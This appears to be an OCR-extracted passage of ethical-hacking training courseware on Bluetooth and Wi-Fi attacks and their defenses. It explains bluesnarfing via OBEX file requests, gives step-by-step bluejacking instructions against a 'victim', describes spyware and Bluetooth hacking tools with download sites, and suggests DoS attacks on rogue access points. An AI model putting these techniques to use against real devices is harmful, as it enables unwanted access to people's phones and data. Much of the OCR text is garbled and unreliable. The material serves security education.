Bluesnarfing is a method of gaining access to sensitive data in a Bluetooth-enabled device. If an attacker is within range of a target, he or she can use special software to obtain the data stored on the victim's device. To Bluesnarf, an attacker exploits a vulnerability in the protocol that Bluetooth uses to exchange information. This protocol is called Object Exchange (OBEX). The attacker connects with the target and performs a GET operation for files with correctly guessed or known names, such as /pb.vcf for the device's phonebook or telecom /cal.vcs for the device's calendar file.

Module 15 Page 2335




CEH

B lu e to o th S ta c k

Bluetooth Modes Discoverable modes 1.

Discoverable: Sends inquiry responses to all inquiries

2.

3.

Limited discoverable: Visible for a certain period of time Non-discoverable: Never answers an inquiry scan

L2CAP

Pairing modes

Link Manager

1.

Non-pairable mode: Rejects every pairing request

2.

Pairable mode: Will pair upon request

Audio

Baseband

Bluetooth Radio


B l u e t o o th S ta c k ‫ז‬ ‫ י‬A Bluetooth stack refers to an implementation of the Bluetooth protocol stack. It allows an inheritance application to work over Bluetooth. Using Atinav's OS abstraction layer, porting to any system is achieved. The Bluetooth stack is divided into: general purpose and embedded system.

B lu e t o o t h

M

o d e s

D is c o v e r a b le

M

o d e s

Basically, Bluetooth operates in three discoverable modes. They are: Q

Discoverable: When Bluetooth devices are in discoverable mode, the devices are able to be seen by other Bluetooth-enabled devices. If a phone is trying to connect to another phone, the phone that is trying to establish the connection must look for a phone that is in "discoverable mode," otherwise the phone that is trying to initiate the connection will not be able to detect the other phone. Discoverable mode is necessary only while connecting to the device for the first time. Once the connection is saved, the phones know each other; therefore, discoverable mode is not necessary for lateral connection establishment.

Module 15 Page 2336




9

Limited discoverable: In limited discoverable mode, the Bluetooth devices are discoverable only for a limited period of time, for a specific event, or during temporary conditions. However, there is no HCI command to set a device directly into limited discoverable mode. It must be done indirectly. When a device is set to the limited discoverable mode, it filters out non-matched lACs and discovers itself only to those that matched.

Q

Non-discoverable: Setting the Bluetooth device to "non-discoverable" mode prevents the devices from appearing on the list during Bluetooth-enabled device search process. However, it is still visible to those s and devices who paired with the Bluetooth device previously or who are familiar with the MAC address of the Bluetooth. P a ir in g

[&. A 1

a

M

o d e s

There are two modes of pairing for Bluetooth devices. They are:

9

Non-pairable mode: In non-pairable mode, a Bluetooth device rejects the pairing request sent by any device.

9

Pairable mode: In pairable mode, the Bluetooth device accepts the pairing request upon request and establishes a connection with the pair requesting device.

HCI o

Link Manager

Audio

o Cl

t O

Baseband

a . ‫ו‬/‫ו‬ c >‫ס‬

Bluetooth Radio FIGURE 15.72: Bluetooth Stack

Module 15 Page 2337




B lu e to o th T h r e a ts

Leaking Calendars and Address Books Attacker can steal 's personal information and can use it for malicious purposes

Bugging Devices Attacker could instruct the to make a phone call to other phones without any interaction. They could even record the 's conversation

Sending SMS M essages Terrorists could send false bomb threats to airlines using the phones of legitimate s

Causing Financial Losses Hackers could send many MMS messages with an international 's phone, resulting in a high phone bill

C EH

Rem ote Control Hackers can remotely control a phone to make phone calls or connect to the Internet

Social Engineering Attackers trick Bluetooth s to lower security or disable authentication for Bluetooth connections in order to pair with them and steal information

M alicious Code Mobile phone worms can exploit a Bluetooth connection to replicate and spread itself

Protocol V ulnerabilities Attackers exploit Bluetooth parings and communication protocols to steal data, make calls, send messages, conduct DoS attacks on a device, start phone spying, etc.

J Copyright © by EG-G(IIIICil. All Rights Reserved. Reproduction is Strictly Prohibited.

^

B lu e to o th T h r e a t s

Similar to wireless networks, Bluetooth devices also subject to various threats. Due to the security flaws in the Bluetooth technology, various Bluetooth threats can take place. The following are the threats to Bluetooth devices: 9

Leaking calendars and address books: An attacker can steal a 's personal information and can use it for malicious purposes.

9

Bugging devices: An attacker could instruct the to make a phone call to other phones without any interaction. They could even record the 's conversation.

9

Sending SMS messages: Terrorists could send false bomb threats to airlines using the phones of legitimate s.

Q

Causing financial losses: Hackers could send many MMS messages with an international 's phone, resulting in a high phone bill.

9

Remote control: Hackers can remotely control a phone to make phone calls or connect to the Internet.

9

Social engineering: Attackers trick Bluetooth s to lower security or disable authentication for Bluetooth connections in order to pair with them and steal information.

Module 15 Page 2338




9

Malicious code: Mobile phone worms can exploit a Bluetooth connection to replicate and spread.

9

Protocol vulnerabilities: Attackers exploit Bluetooth parings and communication protocols to steal data, make calls, send messages, conduct DoS attacks on a device, start phone spying, etc.

Module 15 Page 2339




H o w to B lu e ja c k a V ic tim

CEH

Bluejacking is the activity of sending anonymous messages over Bluetooth to Bluetoothenabled devices such as PDAs, laptops, mobile phones, etc. via the O BEX protocol

J

Select an area with plenty of mobile s, like a cafe, shopping center, etc.

J

Go to s in your address book (You can delete this entry later)

L

c=§=‫!׳‬ cr U *=* JJ

J

Create a new on your phone address book

J

Enter the message into the name field

J

Save the new with the name text and without the telephone number

J

Choose "send via Bluetooth". These searches for any Bluetooth device within range

Ex: "Would you like to go on a date with me?"

J

Choose one phone from the list discovered by Bluetooth and send the

. J

You will get the message "card sent" and then listen for the SMS message tone of your victim's phone

^= L. II Ml II III

Copyright © by EG-C*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.

H o w to B l u e j a c k a V ic tim ___‫ ״‬Bluejacking is "temporarily hijacking another person's cell phone by sending it an anonymous text message using the Bluetooth wireless networking system." The operating range for Bluetooth is 10 meters. Phones embedded with Bluetooth technology can search for other Bluetooth-integrated phones by sending messages to them. Bluejacking is a new term used to define the activity of sending anonymous messages to other Bluetooth-equipped devices via the OBEX protocol. Follow the steps mentioned as follows to Bluejack a victim or a device: STEP 1: Select an area with plenty of mobile s, like a cafe, shopping center, etc. Go to s in your address book. STEP 2: Create a new in your phone address book. Enter a message into the name field, e.g., "Would you like to go on a date with me?" (You can delete this entry later.) STEP 3: Save the new with the name text and without the telephone number. Choose "send via Bluetooth." This searches for any Bluetooth device within range. STEP 4: Choose one phone from the list discovered by Bluetooth and send the . You will get the message "card sent" and then listen for the SMS message tone of your victim's phone.

Module 15 Page 2340




Bluetooth H acking Tool: Super Bluetooth Hack J

CEH

A Bluetooth Trojan when infected allows the attacker to control and read information from victim phone

J

Uses Bluetooth AT commands to access/hack other Bluetooth-enabled phones

J

Once infected, it enables attackers to read messages and s, change profile, manipulate ringtone, restart or switch off the phone, restore factory settings and make calls from a victim's phone

Copyright © by EG-G(nncil. All Rights Reserved. Reproduction is Strictly Prohibited.

B lu e to o th H a c k i n g T o o l: S u p e r B lu e to o th H a c k A Bluetooth Trojan, when infected, allows the attacker to control and read information from the victim's phone. It uses Bluetooth AT commands to access/hack other Bluetoothenabled phones. Once infected, it enables attackers to read messages and s, change profile, manipulate ringtone, restart or switch off the phone, restore factory settings, and make calls from a victim's phone. Super Bluetooth Hack is Mobile Bluetooth hacking software. The tool requires the victim to accept the Bluetooth connection first, but this is just a one-time procedure for pairing the phones. Then it doesn't require pairing the phones in the future.

Module 15 Page 2341




FIGURE15.72: Super Bluetooth Hack screenshots

Module 15 Page 2342




Bluetooth Hacking Tool: PhoneSnoop

CEH

PhoneSnoop is BlackBerry spyware that enables an attacker to remotely activate the

It exists solely to demonstrate the capabilities of a BlackBerry handheld when

microphone of a BlackBerry handheld and listen to sounds near or around it,

used to conduct surveillance on an individual

PhoneSnoop is a component of Bugs - a proof-of-concept spyware toolkit

SED 011:39PM

It is purely a proof-of-concept application and does not possess the stealth or spyware features that could make it malicious

Name: Version:

PhoneSnoop

V e n d o r:

ZenConsult

1.0

Sizc:^■

s

D o s c B fi

The application w as successfully installed

lit ‫ו‬

C °!□

PhoneSnoop

Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.

B lu e to o th H a c k i n g T o o l: P h o n e S n o o p PhoneSnoop is BlackBerry spyware that enables an attacker to remotely activate the microphone of a BlackBerry handheld and listen to sounds near or around it; PhoneSnoop is a component of Bugs, a proof-of-concept spyware toolkit. It exists solely to demonstrate the capabilities of a BlackBerry handheld when used to conduct surveillance on an individual. It is purely a proof-of-concept application and does not possess any of the stealth or spyware features that make it malicious. (M O

‫מ‬

Name: Version: Vendor: Size: Desc f C

011:39 PM

s

PhoneSnoop* 1.0 ZenConsult M.OKB Theapplication was successfully installed. fijjH ( 0K ) ( Run ‫ו‬ ____________1

PhoneSnoop

▼

F IG U R E 15.72: Ph o n eSn o o p screenshots

Module 15 Page 2343




Bluetooth H acking Tool: BlueScanner

CEH

}‫כ‬ A

Arjto

fik

EtucScnmcr -Blurtcorh Device Discovery

Cen*;.‫׳‬t

Ffca

A Bluetooth device discovery and vulnerability assessment tool for Windows

(QOrlEA329Er5D|

type (phone, computer, keyboard, PDA, etc.), and the services that are d by the devices Records all information that can be gathered from the device, without attempting to authenticating with the remote device

lyc ‫ר‬0/25/‫ו‬031‫קר‬.‫ו‬CelUaPhcre ‫ ו‬0> ‫׳‬2‫ ע‬10»‫ וו‬7‫ ; ו‬sdp

81( &36

Bluetooth Device Information

* pi

Discover Bluetooth devices

Help

CeMyFtwre(!)

rql' I M0 k1»PC$tf*t1l

(11 Ajdu6«t***f1l COW I

Ik4 ‫)״״■•׳‬ r11feavtftcc.n1 Per•*-.,, aecx » .«5f 1ah(!1

aecxrirTMitf(•(!!

ri‫ ״‬rt ,,n:U. ' **WLCiert(l) Mu e Payer |1J

Hed«£*8 X1C 2J &IMMXESSII)

□H1d»nj.lhi ce*

G"1«m I R3w5DP| Lac«la | *

Drtt>1p1v*iweri>jrn N^PCSJl.

COM 1 Vatw 3J v .w ill It I Ilnl*VW1y Urkncwn

Urkncwn UrKncwn NtfMikAccttePohi GEE'Ghcoc Pu8h CBEXFife

NcfciaSyreMlServer SyncML 0»rl MmePauCT___

Copyright © by EC-ClllCil. All Rights Reserved. Reproduction is Strictly Prohibited.

B lu e to o th H a c k i n g T o o l: B l u e S c a n n e r BlueScanner is a Bluetooth device discovery and vulnerability assessment tool for Windows XP. Aruba Networks BlueScanner is provided under the Aruba Software License. With a Bluetooth adapter, organizations can use BlueScanner to discover Bluetooth devices, their type (phone, computer, keyboard, PDA, etc.), and the services that are d by the devices. It will identify any discoverable devices within range and record all information that can be gathered from the device, without attempting to authenticate with the remote device. This information includes the device's "human friendly" name, unique address, type, time of discovery, time last seen, and any Service Discovery Protocol (SDP) information provided by the device.

Module 15 Page 2344




/A Aruba Networks BlueScanner ‫ ־‬Bluetooth Device Discovery File

Configure

Filter

Nft»wr»k

*j

Mansge

Help

Loo

[‫י‬/ Apply Filter Last Seen

t

First Seen/LastSsen 10/25/10 at 17:16:35 (8) 10/25/10 al 17:17:38

1

Sizzle ... (00:1EA3:29:EF:5D)

Tipe/Flags Celular Phone

Now (1)

Location

Bluetooth Device Information

None (I)

Type Cellulai Phone (1)

Services

Sizzlei... (00:1EA3:29:EF:5D) General RawSDP

Dial-up networking (1) Nokia PC Suite (1) COM 1(1)

m

Voice Gateway (1)

d Services

Audio Gateway (1)

Dial-up networkng Nokia PC Suite COM 1 Voice Gateway

Unknown (4) Netwoik Access Point Service (1) OBEX Hbjcct Push (1)

Audio Gateway

Media 3layer (2)

Unknown Unknown Unknown Network Acces: Point Service Unknown OBEX Obted Push OBEX Fie Trance*

SIM ACCESS (1)

N(Ai<j S y « S a v e i

OBEX r ile Transfer (1) Nokia SyncML Server (1) SyncML Client (1) Music-Player (1)

SyncML CSent Music-Ptavet

Hide Inactive Devices

F IG U R E 15.73: B lu eScan n e r screenshot

Module 15 Page 2345




B lu e to o th H a c k in g T o o ls

f

N

m %> “ H!

BTBrowser

Blooover

http://wireless.klings.org

http://trifinite.org

BH Bluejack

|7

n

http://croozeus.com

Bluesnarfer

4 ^ 0

CIHwBT http://sourceforge.net

BTCrawler

*

http://www.silentservices.de

1

BTScanner http://www.pentest.co.uk

http://www.airdem on.net

^

CEH

BT Audit http://trifinite.org

Bluediving

BlueAlert

http://bluediving.sourceforge,net

http://www.insecure.in


B lu e to o th H a c k i n g T o o ls Bluetooth hacking tools allow attackers to extract as much information as possible from a Bluetooth device without the requirement to pair. These tools are used to scan for other visible devices in range and can perform a service query. A few tools used to perform Bluetooth hacking are listed as follows: 9

BTBrowser available at http://wireless.klings.org

9

BH Bluejack available at http://croozeus.com

9

Bluesnarfer available at http://www.airdemon.net

9

BTCrawler available at http://www.silentservices.de

s

Bluediving available at http://bluediving.sourceforge.net

9

Blooover available at http://trifinite.org

Q BTScanner available at http://www.pentest.co.uk 9

CIHwBT available at http://sourceforge.net

9

BT Audit available at http://trifinite.org

9

BlueAlert available at http://www.insecure.in

Module 15 Page 2346




Module Flow

CEH

M o d u l e F lo w

m _______

So far, we have discussed wireless concepts, wireless encryption, threats associated with wireless networks, hacking methodology, various wireless hacking tools, and Bluetooth hacking. All these concepts and tools help in hacking or penetrating a wireless network. Now we will go over the countermeasures that can help in patching the determined security loopholes. Countermeasures are the practice of using multiple security systems or technologies to prevent intrusions. This section is dedicated to countermeasures and the practices that can defend against various hacking techniques or methods.

Wireless Concepts

Wireless Threats


Module 15 Page 2347

A

HI • p

Wireless Encryption


Bluetooth Hacking



Module 15 Page 2348





How to Defend Against Bluetooth Hacking Use non-regular patterns as PIN

CEH

Keep BT in the disabled state,

keys while pairing a device. Use those key combinations which are

enable it only when needed and disable immediately after the

non-sequential on the keypad

intended task is completed

Always enable encryption when establishing BT

Keep the device in nondiscoverable (hidden) mode

connection to your PC

Keep a check of all paired devices in the past from time to time and

DO NOT accept any unknown and unexpected request for pairing

delete any paired device which you are not sure about

your device


H o w to D e f e n d A g a i n s t B lu e to o th H a c k i n g Even though security gaps are being filled periodically by the manufacturer and technologist, the following are some of the tips that a normal should keep in mind and protect himself or herself away from an amateur BT hacker: e

Keep BT in the disabled state; enable it only when needed and disable immediately after the intended task is completed.

9

Keep the device in non-discoverable (hidden) mode.

9

DO NOT accept any unknown and unexpected request for pairing your device.

9

Keep a check of all paired devices in the past from time to time and delete any paired device which you are not sure about.

Q Always enable encryption when establishing BT connection to your PC. 9

Use non regular patterns as PIN keys while pairing a device. Use those key combinations that are non-sequential and non-obvious on the keypad.

Module 15 Page 2349




H o w to D e t e c t a n d B l o c k R o g u e A P

CEH l*rt«f**4

Detecting Rogue A P

itfeul •U.U.

B locking Rogue AP

R F S c a n n in g

J

Re-purposed access points that do only packet capturing and analysis (RF sensors) are plugged in all over the wired network to detect and warn the WLAN about any wireless devices operating in the area

Deny wireless service to new clients by launching a denial-of-service attack (DoS) on the rogue AP

J

Block the switch port to which AP is connected or manually locate the AP and pull it physically off the LAN

A P S c a n n in g Access points that have the functionality of detecting neighboring APs operating in the nearby area will expose the data through its MIBS and web interface

U s in g W ire d S id e Inp u ts Network management software uses this technique to detect rogue APs. This software detects devices connected in the LAN, including Telnet, SNMP, CDP (Cisco discovery protocol) using multiple protocols

Copyright © by EC-GOIIIlCil. All Rights Reserved. Reproduction isStrictly

Prohibited.

H o w to D e t e c t a n d B lo c k R o g u e A P s Detecting and blocking rogue access points are important tasks that need to be implemented to ensure the security of a wireless network and to protect the wireless network from being compromised. D e t e c t in g

R o g u e

A P s

A rogue AP is one that is not authorized by the network for operation. The problem associated with these rogue APs is that these APs don't conform to wireless security policies. This may enable an insecure open interface to the trusted network. There are various techniques available to detect rogue AP. Following are the techniques to detect rogue APs: RF scanning: Re-purposed access points that do only packet capturing and analysis (RF sensors) are plugged in all over the wired network to detect and warn the WLAN about any wireless devices operating in the area. These sensors don't cover the dead zones. More sensors are needed to be added, to detect the access points placed in dead zones. Q AP scanning: Access points that have the functionality of detecting neighboring APs operating in the nearby area will expose the data through its MIBS and web interface.

Module 15 Page 2350




The drawback in this case is the ability of AP to discover neighboring devices is limited to certain extent. Q

Using wired side inputs: Network management software uses this technique to detect rogue APs. This software detects devices connected in the LAN, including Telnet, SNMP, and CDP (Cisco discovery protocol) using multiple protocols. Irrespective of its physical location, APs present anywhere in the network can be discovered using this technique. B lo c k in g

R o g u e

A P

If any rogue APs are found in a wireless LAN, then they have to be blocked immediately to avoid authorized s or clients from being associated with it. This can be done in two ways: 9

Deny wireless service to new clients by launching a denial-of-service attack (DoS) on the rogue AP

© Block the switch port to which AP is connected or manually locate the AP and pull it physically off the LAN

FIGURE 15.74: Blocking Rogue AP

Module 15 Page 2351




W ire le s s S e c u rity L a y e rs

c EH

ItiVM itkxjl IU(M«

RF Spectrum

Per-Packet Authentication,

Security Wireless IDS

Centralized Encryption

Vulnerabilities and Patches

Wireless Signal Security

Connection Security

Data Protection

/B \

a

WPA2 and AES

T - r

j

^

M

Device Security

Network Protection

End- Protection

Stateful Per

Strong Authentication

Firewalls

Copyright © by IG-GOHCil. All Rights Reserved. Reproduction is Strictly Prohibited.

W ire le s s S e c u rity L a y e rs A wireless security mechanism has six layers to ensure security related to various [jfe__ " issues. This layered approach increases the scope of preventing the attacker from compromising a network and also increases the possibility of attacker being caught easily. The following is the structure of wireless security layers: fa

□

RF Spectrum Security Wireless IDS

Vulnerabilities and Patches

Wireless Signal Security

Device Security

Strong Authentication

Connection Security

Network Protection

Data Protection

WPA2 and AES

End- Protection

Stateful Per Firewalls

F IG U R E 15.75: Stru ctu re of W ire le s s security layers

Module 15 Page 2352




Q Connection security: Per frame/packet authentication provides complete protection against "man-in-the-middle" attacks. It does not allow the attacker to sniff the data when two genuine s are communicating between each other thereby securing the connection. Q

Device security: Both vulnerability and patch management are the important component of security infrastructure since, these two components detect and prevent vulnerabilities before they are actually misused and compromise the device security.

Q Wireless signal security: In wireless networks, continuous monitoring and managing of network and the RF spectrum within the environment identifies the threats and awareness capability. The Wireless Intrusion Detection System (WIDS) has the capability of analyzing and monitoring the RF spectrum. The unauthorized wireless devices that violate the security policies of the company can be detected by alarm generation. The activities such as increased bandwidth usage, RF interferences, and unknown rogue wireless access points etc. are the indications of the malicious network. With the help of these indications you can easily detect the malicious network and can maintain the wireless security. The attacks against the wireless network cannot be predicted. Continuous monitoring of the network is the only measure that can be used to prevent such attacks and secure the network. Network protection: Strong authentication ensures only authorized to gain access to your network thereby protecting your network from attacker. Q

Data protection: Data protection can be attained by encrypting the data with the help of the encryption algorithms such as WPA2 and AES.

Module 15 Page 2353



Q


End- protection: Even if the attacker is associated with the Aps, the personal firewalls installed on the end system on the same WLAN prevents the attacker from accessing the files on an end- device, thereby protects the end .

Module 15 Page 2354




How to D efend A gainst W ireless Attacks Configuration Best Practices

£g

SSID Settings Best Practices

1

Change th e defau lt SSID a fte r W L A N configuration

2

S e t th e router access and enab le firew all protection

3

Disable SSID broadcasts

4

Disable rem ote router and w ireless inistration

5

Enable M AC Address filtering on yo u r access point or router

6

Enable encryption on access point and change phrase often


H o w to D e f e n d A g a i n s t W i r e l e s s A t ta c k s Besides using tools that monitor the security of a wireless network, s can follow some approaches to defend their networks against various threats and attacks. The following are some of the configured best practices for Wi-Fi that ensure WLAN security: e

Change the default SSID after WLAN configuration

9

Set the router access and enable firewall protection

9

Disable SSID broadcasts

9

Disable remote router and wireless istration

Q

Enable MAC Address filtering on your access point or router

Q

Enable encryption on access point and change phrase often

Module 15 Page 2355

Ethical Hacking and Countermeasures Copyright © by EC-C0linCil All Rights Reserved. Reproduction is Strictly Prohibited.



How to Defend Against Wireless Attacks (Cont’d) r

c EH ItkMjl IlMhM

1

Configuration

SSID Settings

Authentication

H

Best Practices

Best Practices

Best Practices

|

keep certain default wireless messages from broadcasting the ID to everyone Do not use your SSID, company name, network name, or any string in phrases firewall or packet filter in between the AP and the corporate

Limit the strength of the wireless network outside the bounds of your organization Check the wireless devices for Implement an additional technique for over wireless

Copyright © by IG-C0HCil. All Rights Reserved. Reproduction is Strictly Prohibited

H o w to D e f e n d A g a i n s t W i r e l e s s A t t a c k s ( C o n t ’d) Wireless networks can be protected from various wireless attacks by changing the SSID settings to provide high-level security. The following are the ways to set the SSID settings that ensure WLAN security: 9

Use SSID cloaking to keep certain default wireless messages from broadcasting the ID to everyone

9

Do not use your SSID, company name, network name, or any easy to guess string in phrases

9

Place a firewall or packet filter in between the AP and the corporate Intranet

9

Limit the strength of the wireless network so it cannot be detected outside the bounds of your organization

9

Check the wireless devices for configuration or setup problems regularly

9

Implement a different technique for encrypting traffic, such as IPSec over wireless

Module 15 Page 2356




How to D ef end Against W ireless Attacks (coiit’d)

C EH

Urtifwtf

ItkK Jl lUckM

‫די‬

Authentication Best Practices

Configuration Best Practices___

L

H o w to D e f e n d A g a i n s t W i r e l e s s A t t a c k s ( C o n t ’d) Setting strong authentication for Wi-Fi networks access can be a considered as a measure to defend the WLAN against wireless attacks. The following are the ways to set Wi-Fi authentication to the strongest level: e

Choose Wi-Fi Protected Access (WPA) instead of WEP

9

Implement WPA2 Enterprise wherever possible

9

Disable the network when not required

9

Place wireless access points in a secured location

© Keep drivers on all wireless equipment updated 9

Use a centralized server for authentication

Module 15 Page 2357




How to D efend A gainst W ireless Attacks (Cont’d)

C EH

H o w to D e f e n d A g a i n s t W i r e l e s s A t t a c k s ( C o n t ’d) Many wireless defense techniques are adopted for protecting the network against wireless attacks and we have discussed them in a previous module. Using appropriate WIDS, RADIUS server and other security mechanisms at the right place can defend your wireless network from being attacked.

Module 15 Page 2358



Attacker


Disassociate Unauthorized s

A

Disable Broadcast SSID

FIGURE 15.76: Defending against wireless attacks

Module 15 Page 2359




M o d u l e F lo w Wireless security can be accomplished not only with manual methods but also with wireless security tools. The security tools combined with the manual methods make the WLAN more secure. This section is dedicated to wireless security tools and mechanisms.

Wireless Concepts

•

|E1

Wireless Threats

Wireless Encryption


6 -


P

Countermeasure

‫י‬/ —

Bluetooth Hacking

Wireless Security Tools ■y— S —r d

Wi-Fi Pen Testing

Module 15 Page 2360




W ireless Intrusion Prevention System s

CEH

Airsnarf Attack

Chopchop Attack

Wireless intrusion prevention systems protect networks against wireless threats, and enable s to detect and

Day-zero Attack

prevent various network attacks

Device Probing

Rogue Iden and Con

Probing and Discov! Fragmentation Attack

Honeypot

MAC Spoofing

Fake DH Server


W i r e l e s s I n t r u s i o n P r e v e n t i o n S y s te m s * j A wireless intrusion prevention system (WIPS) is a network device that monitors the radio spectrum for detecting access points (intrusion detection) without the permission of the hosts in nearby locations, and it can also implement countermeasures automatically. Wireless intrusion prevention systems protect networks against wireless threats, and enable s to detect and prevent various network attacks.

Module 15 Page 2361




Airsnarf Attack

F Traffic

Chopchop Attack

a r m o rin g

Day-zero Attack Netwoik Intrusion I Device Probing

Unauthorized Association

Rogue Idem and Con1

D e te ctio n

Probing and Network Discov

Location Tracking

Fragmentation Attack

Honeypot

ASLEAP Attack

W EP Crack

MITM Attack

MAC Spoofing

Fake DH Server

FIGURE 15.77: Wireless Intrusion Prevention Systems

Module 15 Page 2362




W ire le s s IP S D e p lo y m e n t

CEH

(«rt1fw4

tlfcxjl HMbM

DMZ

Wi-Fi Intrusion Prevention System


W i r e l e s s IP S D e p l o y m e n t A WIPS is made up of a number of components that work together to provide a unified security monitoring solution. Component functions in a Cisco's Wireless IPS Deployment: 9

Access Points in Monitor Mode: Provides constant channel scanning with attack detection and packet capture capabilities.

9

Mobility Services Engine (running wireless IPS Service): The central point of alarm aggregation from all controllers and their respective wireless IPS Monitor Mode Access Points. Alarm information and forensic files are stored on the system for archival purposes.

9

Local Mode Access Point(s): Provides wireless service to clients in addition to timesliced rogue and location scanning.

9

Wireless LAN Controller(s): Forwards attack information from wireless IPS Monitor Mode Access Points to the MSE and distributes configuration parameters to APs.

9

Wireless Control System: Provides the the means to configure the wireless IPS Service on the MSE, push wireless IPS configurations to the controller, and set APs into wireless IPS Monitor mode. It is also used for viewing wireless IPS alarms, forensics, reporting, and accessing the threat encyclopedia.

Module 15 Page 2363




DMZ

O

“

Authentication _ . Database Server

W iF i

Intrusion Prevention

System

Corporate Wi-Fi Network FIGURE 15.78: Cisco's Wireless IPS Deployment

Module 15 Page 2364

Ethical Hacking and Countermeasures Copyright © by EC-C0l1ncil All Rights Reserved. Reproduction is Strictly Prohibited.



Wi-Fi Security Auditing Tool: AirMagnet WiFi Analyzer J

It is a Wi-Fi networks auditing and troubleshooting tool

J

Automatically detects security threats and other wireless network vulnerabilities

J

It detects Wi-Fi attacks such as Denial of Service attacks, authentication/ encryptions attacks, network penetration attacks, etc.

J

It can locate unauthorized (rogue) devices or any policy violator

-‫ ל‬A f f a i r * * ■ ■ KS *•(*beHn-fc* [0 3 MDdt-twt-^7 ks

‫־‬

U [3 1»‫־‬ N I t

902 ‫ ו ו‬WDtwhcf!

O ssio ‫זמן‬ 5

A<J-M0C

“

*=>::P9:F9:6A* ‫מ י‬ oe: u!<0*e1«4:70

‫״‬

l00 l0e

-

60‫־‬ SE!JB9C FC«:fB:4Af23l »-00:».‫נכ‬:07£;

n

100 •H 100 1nr 100 IOC 100 -10c 0 w*a‫«ג‬ 100 IOC 0 100 10‫׳‬. 0 Ope‫״‬ 4! •M 0 **AJ*

n ‫י‬8

J

‫נ‬

100

0 WAJr •, M ~ ‫<*'•'׳‬: ‫׳‬. a m 0 Open 1. .

,’CrffcfSiUf‫נ‬

V AiWtSt

AP (87)

31 -TAI12H - *J AlVlSEAdv<• ffl ; ^ ‫מו‬/‫ ןמו‬43^

**-tST-V-9 tip 6«‫< נ׳‬r>tm Uotwi-cn-to *e-T£5TAI>* UniwrtvTVlP*

CEH

t. » « 1 N '* **•n U *C«t

AlrWlSE

*•euilylDSdPS

p . «‫ ל‬c•‫*״‬ ‫•^><זיב*ו‬cuiv ♦‫ ט‬RjvÂP‫״‬v,£'lVwnf . ‫ ם‬uwaj‫■״׳״*״‬ -‫'״״‬

1

. p*#o*runc• Vk**0t 4

B S S S S fS .

2 ‫;־‬

‫וי‬

<

‫— ״* — ■*כ‬

;.com ,//W W W ./ ‫ ״׳‬k e n e r


W i-F i S e c u r it y A n a ly z e r

A u d i t in g

T o o l:

A irM a g n e t

W iF i

Source: http://www.flukenetworks.com AirMagnet WiFi Analyzer is a standard tool for mobile auditing and troubleshooting enterprise Wi-Fi networks. It helps IT staff solve end- issues while automatically detecting security threats and wireless network vulnerabilities. The solution enables network managers to test and diagnose dozens of common wireless performance issues including throughput issues, connectivity issues, device conflicts, and signal multipath problems. It includes a full compliance reporting engine, which automatically maps collected network information to requirements for compliance with policy and industry regulations. AirMagnet WiFi Analyzer is available in "Express" and "PRO" versions. Express provides the core building blocks of Wi-Fi troubleshooting and auditing with the ability to see devices, automatically identify common problems, and physically locate specific devices. PRO version significantly extends all the capabilities found in the Express version and adds many more to provide a Wi-Fi tool to solve virtually any type of performance, security, or reporting challenge in the field. AirMagnet WiFi Analyzer can detect Wi-Fi attacks such as DoS attacks, authentication/encryptions attacks, network penetration attacks, etc. It can easily locate unauthorized (rogue) devices or any policy violator.

Module 15 Page 2365



*


Ail Magnet W iFi Analyze! PRO - deino 55.0% H e*

2.4/5GHz *

E ₪ Dashboard

Start

I

Signal Level(dBm)

2 4GHr(002 ‫ ו ו‬b.

W © 3

1

1C:BD:B9:B6:56:5A

V ‫ ׳‬11 © AME-TEST-AP-9 V 161 © btock‫־‬test-ap-7 © lap-beij-cn-tek *‫׳‬

-

( 3 Security IDS/IPS (43.198.89,3) ^ Performance Violation (0,0,9,81) Broadcast

1C:BD:B9:B6:66:5A

6887 Multicast

389

Uncast

11361

0

Total Fra..

18637

0.00?S

1

-100 -100 0

WPA2-P N

n

•100 ‫־‬86

WPA2-E N

srnonte

6a:BD;A8;D3:07;E2

n

-100 ■100 0

Open

N

Authori

n

0

•100 ■100 0

WPA2-E N

NG5nev

Open

don't bk

68:0D:AB:D3:33:A1

n

-100 -100 0

WPA2-E N

E0:46:9A: 5E:26:90

n

-100 -100 0

WPA2-P N

NETGE^

FC:FBfB:6A:E2:31

n

-100 -100 0

WPA2-E N

AHC-E1

V 11 © lap-beij-cn-tek V 11 © lap-beij-cn-tek

68:BO:AB:D3:07:E1

n

-100 -100 0

WPA2-E

N

5a:BC:27:93:EE:B2

n

•100 -100

0

Open

N

Author!

* ‫ ׳‬149 © AME-TEST-AP-9

FC:FBi=B:6A:E2:39 /•^•‫חח‬4‫ו ח ח‬. ‫ ו ר‬4‫ח‬

n

0

WPA2-P N

AHC«

n

W V ll- T

© E0:46:9A:SE:2B:9D

l*r*->V^n -rrs

AirWISE ^ Security IDS/IPS P‫־־‬l Ccnfioiiation Vulneiabkt + C3 IDS •Denial of Service A D IDS •Seemly Penetratio * Q Rogue AP arid Slaton ♦ Q Authenticaticr! &Er ‫ ♦ ־‬Performance Violation Q Channel or Device Overl

. 1 nn -inn

3

N

A irW IS E

1-

A11WISEAdvice

dirk

R

•100 -94 0

ft

S STA( 121)

SSID

a

11 © AME-TEST-AP-9

802.11 Information O SSID (331 Q Ad-Hoc - K Infrastructure i«> AP (87)

Security ©

FC:FB:FB:6A:E2:3A

%

-

|Q

n

6 40

\s

■11 (D

FC:FB:FB:6A:E2:32

■ 1 3C

1 0 - IL i- ©

© Ad-Hoc

00:13:60:6E:64:70

6

10r>

STA

m

5GH48021 W m O

g

Type: AP

* ‫ ׳‬149 © AME-TEST-AP-9 11 © lap-oeij-an-tek

1 >1gnal Levd(cBm]

AP

I© Device

11 ©

10

J g All Devices

'J___ S' curty DS/tPS

r

Performance V lolation

U---- ----------

‫ ־‬7

..... ‫״״‬ 1k &

« a!! m

‫־‬

<_ I I Filter Alarms By Device

F IG U R E 15.79: A irM a g n e t W iF i Analyzer Screensho t

Module 15 Page 2366




Wi-Fi Security Auditing Tool: A irD efense

,‫^ן‬

C EH —- ‫»־־‬

W i-F i S e c u r it y A u d i ti n g T o o l: A i r D e f e n s e Source: http://www.airdefense.net

